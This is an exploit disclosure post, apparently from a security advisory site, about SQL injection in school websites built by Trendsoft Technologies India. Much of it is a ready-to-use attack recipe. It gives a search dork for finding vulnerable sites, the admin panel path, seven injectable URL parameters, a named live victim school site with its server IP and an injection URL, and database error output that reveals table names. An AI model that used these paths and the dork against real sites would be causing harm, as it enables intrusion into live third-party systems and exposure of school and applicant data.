Trendsoft Technologies India SQL Injection Vulnerability

2019.01.08
gb KingSkrupellos (GB) gb
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: intext:''Designed & Maintained by Trendsoft Technologies''

############################################################ # Exploit Title : Trendsoft Technologies India SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 08/01/2019 # Vendor Homepage : trendsoft.info # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Designed & Maintained by Trendsoft Technologies'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ############################################################ # Admin Panel Login Path : *********************** /admin/ # SQL Injection Exploit : ********************* /page_detail.php?sid=Njk=&pid=NTA=[SQL Injection] /contact_us.php?sid=NQ==[SQL Injection] /principal_message.php?sid=Mg==[SQL Injection] /alumni_gallery.php?pid=MQ==[SQL Injection] /kg_gallery.php?pid=MQ==[SQL Injection] /video_gallery.php?pid=Ng==[SQL Injection] /onlineapp/AdmFormfatima.php?id=[SQL Injection] ############################################################ # Example Vulnerable Site => ************************** Note => (103.92.235.205) => There are 7 domains hosted on this server. [+] fatimaconventschool.com/page_detail.php?sid=Njk=&pid=NTA=1%27 [Proof of Concept ] => archive.fo/0S8I0 ############################################################ # SQL Database Error : ********************* cannot execute query select staticId,parentId,staticTitle,externalLink from tbl_fatima_static_pages where enable='Activate' and parentId=505 order by orderOfAppearance ascYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near order by orderOfAppearance asc' at line 1 select * from adminsetup where class= You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ############################################################ # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ############################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top